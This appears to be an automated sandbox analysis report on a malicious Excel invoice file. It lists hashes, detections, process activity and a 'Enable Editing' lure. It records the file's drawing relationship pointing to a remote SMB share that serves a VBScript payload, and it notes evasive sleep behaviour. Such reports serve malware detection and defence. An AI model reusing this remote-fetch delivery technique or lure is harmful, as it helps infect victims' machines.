Windows Analysis Report
re-march-26-2024-9856.xlsx

Overview

General Information

Sample name: re-march-26-2024-9856.xlsx
Analysis ID: 1415996
MD5: 0fe64551215d4dd591d98b165d74d986
SHA1: a507acb09dc6ecabcf510aceaac6febd51f01e72
SHA256: 16663b57e182a8f945a9aa5f70627b4ffbd6369784c5744eff304ecacc40fb7f
Tags: Invoicexlsx
Infos:

Detection

MAC Stealer
Score: 64
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected MalDoc
Detected suspicious Microsoft Office reference URL
Opens network shares
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Document misses a certain OLE stream usually present in this Microsoft Office document type
May sleep (evasive loops) to hinder dynamic analysis
Sigma detected: Explorer Process Tree Break
Tries to load missing DLLs

Classification

Exploits
barindex
Detected suspicious Microsoft Office reference URL
Source: drawing1.xml.rels Extracted files from sample: file:///\\170.130.55.130\share\a\report-26-2024.vbs..........
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\24F09391.gif Jump to behavior

System Summary
barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 Screenshot OCR: Enable Editing'. a 14 I 15 16 17 Open 18 19 20 21 22 23 24 Stay in the groove wIth .Micro
Source: Document image extraction number: 0 Screenshot OCR: Enable Editing'. Stay in the groove with Microsoft Office Excel integration with Microsoft Azure C
Source: Document image extraction number: 2 Screenshot OCR: Enable Editing'. Open Stay in the groove wIth Microsoft Office Excel integrauon with Microsoft Az
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Windows\SysWOW64\explorer.exe Memory allocated: 770B0000 page execute and read and write Jump to behavior
Document misses a certain OLE stream usually present in this Microsoft Office document type
Source: CCE0.tmp.0.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Tries to load missing DLLs
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: wow64win.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: wow64cpu.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: duser.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: dui70.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: powrprof.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: davhlpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: cscapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: rpcrtremote.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: duser.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: dui70.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: powrprof.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: rpcrtremote.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: davhlpr.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: shdocvw.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: msisip.dll Jump to behavior
Source: classification engine Classification label: mal64.troj.spyw.expl.winXLSX@3/6@0/0
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$re-march-26-2024-9856.xlsx Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVR6DA0.tmp Jump to behavior
Source: re-march-26-2024-9856.xlsx OLE indicator, Workbook stream: true
Source: unknown Process created: C:\Windows\SysWOW64\explorer.exe explorer \\170.130.55.130\share\a\Report-26-2024.vbs..........
Source: unknown Process created: C:\Windows\SysWOW64\explorer.exe
Source: unknown Process created: C:\Windows\explorer.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: unknown Process created: C:\Windows\SysWOW64\explorer.exe explorer \\170.130.55.130\share\a\Report-26-2024.vbs..........
Source: unknown Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
Source: C:\Windows\SysWOW64\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: re-march-26-2024-9856.xlsx Initial sample: OLE zip file path = xl/media/image1.gif
Source: re-march-26-2024-9856.xlsx Initial sample: OLE zip file path = xl/media/image2.gif
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: re-march-26-2024-9856.xlsx Initial sample: OLE indicators vbamacros = False
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\SysWOW64\explorer.exe TID: 2428 Thread sleep time: -120000s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe TID: 2836 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected MalDoc
Source: Yara match File source: drawing1.xml.rels, type: SAMPLE
Opens network shares
Source: C:\Windows\SysWOW64\explorer.exe File opened: \\170.130.55.130\share Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe File opened: \\170.130.55.130\share Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe File opened: \\170.130.55.130\share Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe File opened: \\170.130.55.130\share\a Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe File opened: \\170.130.55.130\share Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe File opened: \\170.130.55.130\share Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe File opened: \\170.130.55.130\share Jump to behavior
Source: C:\Windows\explorer.exe File opened: \\170.130.55.130\share\a\Report-26-2024.vbs Jump to behavior
Source: C:\Windows\explorer.exe File opened: \\170.130.55.130\share\a\Report-26-2024.vbs Jump to behavior
Source: C:\Windows\explorer.exe File opened: \\170.130.55.130\share\ Jump to behavior

Remote Access Functionality
barindex
Yara detected MalDoc
Source: Yara match File source: drawing1.xml.rels, type: SAMPLE
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1415996 Sample: re-march-26-2024-9856.xlsx Startdate: 26/03/2024 Architecture: WINDOWS Score: 64 12 Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) 2->12 14 Yara detected MalDoc 2->14 16 Detected suspicious Microsoft Office reference URL 2->16 5 explorer.exe 2->5         started        8 explorer.exe 3 2->8         started        10 EXCEL.EXE 53 14 2->10         started        process3 signatures4 18 Opens network shares 5->18
No contacted IP infos